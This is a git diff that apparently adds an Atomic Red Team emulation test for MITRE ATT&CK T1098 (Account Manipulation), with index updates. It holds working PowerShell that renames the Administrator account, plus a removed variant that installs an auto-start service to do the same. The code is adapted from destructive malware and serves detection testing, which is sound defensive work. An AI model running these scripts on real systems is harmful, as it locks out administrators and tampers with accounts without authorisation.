diff --git a/Windows/Credential_Access/Account_Manipulation.md b/Windows/Credential_Access/Account_Manipulation.md
deleted file mode 100644
index 98dffc9c..00000000
--- a/Windows/Credential_Access/Account_Manipulation.md
+++ /dev/null
@@ -1,62 +0,0 @@
-# Account Manipulation
-
-MITRE ATT&CK Technique: [T1098](https://attack.mitre.org/wiki/Technique/T1098)
-
-Adapted from [Operation Blockbuster](https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf)
-
-## Example 1
-
-If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 16 digits.
-
-    $x = Get-Random -Minimum 2 -Maximum 9999
-    $y = Get-Random -Minimum 2 -Maximum 9999
-    $z = Get-Random -Minimum 2 -Maximum 9999
-    $w = Get-Random -Minimum 2 -Maximum 9999
-    Write-Host HaHaHa_$x$y$z$w
-
-    $hostname = (Get-CIMInstance CIM_ComputerSystem).Name
-
-    $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
-
-    foreach($member in $fmm) {
-        if($member -like "*Administrator*") {
-            Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
-            Write-Host "Successfully Renamed Administrator Account on" $hostname
-            }
-        }
-
-## Example 2
-
-If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 8 digits.
-
-    $x = Get-Random -Minimum 2 -Maximum 99
-    $y = Get-Random -Minimum 2 -Maximum 99
-    $z = Get-Random -Minimum 2 -Maximum 99
-    $w = Get-Random -Minimum 2 -Maximum 99
-    $newadmin = "HaHaHa_$x$y$z$w".ToString()
-
-    $serviceName = "Rename Account Service"
-    $serviceDisplayName = "Rename Account Service"
-    $serviceDescription = "Rename Account Service"
-    $serviceExecutable = "wmic useraccount where name='Administrator' rename '$newadmin'"
-
-    if (Get-Service $serviceName -ErrorAction SilentlyContinue)
-    {
-        $serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'"
-        $serviceToRemove | Stop-Service
-        $serviceToRemove.delete()
-    }
-    else
-    {
-        "service does not exists"
-    }
-
-    Write-Host "Installing service: $serviceName"
-    New-Service -name $serviceName -displayName $serviceDisplayName -binaryPathName $serviceExecutable -startupType Automatic -Description $serviceDescription
-    Write-Host "Installation completed: $serviceName"
-
-    Write-Host "Trying to start new service: $serviceName"
-
-    $serviceToStart = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'"
-    $serviceToStart.startservice()
-    Write-Host "Service started: $serviceName"
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
new file mode 100644
index 00000000..00c27157
--- /dev/null
+++ b/atomics/T1098/T1098.md
@@ -0,0 +1,47 @@
+# T1098 - Account Manipulation
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1098)
+<blockquote>Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.
+
+Detection: Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738. (Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ (Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password. (Citation: GitHub Mimikatz Issue 92 June 2017)
+
+Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.
+
+Platforms: Windows
+
+Data Sources: Authentication logs, API monitoring, Windows event logs, Packet capture
+
+Permissions Required: Administrator</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate)
+
+
+<br/>
+
+## Atomic Test #1 - Admin Account Manipulate
+Manipulate Admin Account Name
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+$x = Get-Random -Minimum 2 -Maximum 9999
+$y = Get-Random -Minimum 2 -Maximum 9999
+$z = Get-Random -Minimum 2 -Maximum 9999
+$w = Get-Random -Minimum 2 -Maximum 9999
+Write-Host HaHaHa_$x$y$z$w
+
+$hostname = (Get-CIMInstance CIM_ComputerSystem).Name
+
+$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
+
+foreach($member in $fmm) {
+    if($member -like "*Administrator*") {
+        Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
+        Write-Host "Successfully Renamed Administrator Account on" $hostname
+        }
+    }
+```
+<br/>
diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml
new file mode 100644
index 00000000..43baa340
--- /dev/null
+++ b/atomics/T1098/T1098.yaml
@@ -0,0 +1,33 @@
+---
+attack_technique: T1098
+display_name: Account Manipulation
+
+atomic_tests:
+- name: Admin Account Manipulate
+  description: |
+    Manipulate Admin Account Name
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+
+  executor:
+    name: powershell
+    command: |
+      $x = Get-Random -Minimum 2 -Maximum 9999
+      $y = Get-Random -Minimum 2 -Maximum 9999
+      $z = Get-Random -Minimum 2 -Maximum 9999
+      $w = Get-Random -Minimum 2 -Maximum 9999
+      Write-Host HaHaHa_$x$y$z$w
+
+      $hostname = (Get-CIMInstance CIM_ComputerSystem).Name
+
+      $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
+
+      foreach($member in $fmm) {
+          if($member -like "*Administrator*") {
+              Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
+              Write-Host "Successfully Renamed Administrator Account on" $hostname
+              }
+          }
diff --git a/atomics/index.md b/atomics/index.md
index 13510a27..7225e568 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -263,7 +263,8 @@
 - [T1124 System Time Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 
 # credential-access
-- [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
+- [T1098 Account Manipulation](./T1098/T1098.md)
+  - Atomic Test #1: Admin Account Manipulate [windows]
 - [T1139 Bash History](./T1139/T1139.md)
   - Atomic Test #1: xxxx [linux, macos]
 - [T1110 Brute Force](./T1110/T1110.md)
diff --git a/atomics/matrix.md b/atomics/matrix.md
index 4f74ce32..630f13e9 100644
--- a/atomics/matrix.md
+++ b/atomics/matrix.md
@@ -1,7 +1,7 @@
 # All Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
+| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
 | [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Bash History](./T1139/T1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
 | [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
 | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 29474339..eaa24e01 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -203,7 +203,8 @@
 - [T1124 System Time Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 
 # credential-access
-- [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
+- [T1098 Account Manipulation](./T1098/T1098.md)
+  - Atomic Test #1: Admin Account Manipulate [windows]
 - [T1110 Brute Force](./T1110/T1110.md)
   - Atomic Test #1: Brute Force Credentials [windows]
 - [T1003 Credential Dumping](./T1003/T1003.md)
diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md
index 04b88a2e..878271ba 100644
--- a/atomics/windows-matrix.md
+++ b/atomics/windows-matrix.md
@@ -1,7 +1,7 @@
 # Windows Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Account Discovery](./T1087/T1087.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
+| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
 | [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Brute Force](./T1110/T1110.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
 | [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppInit DLLs](./T1103/T1103.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
 | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credentials in Files](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |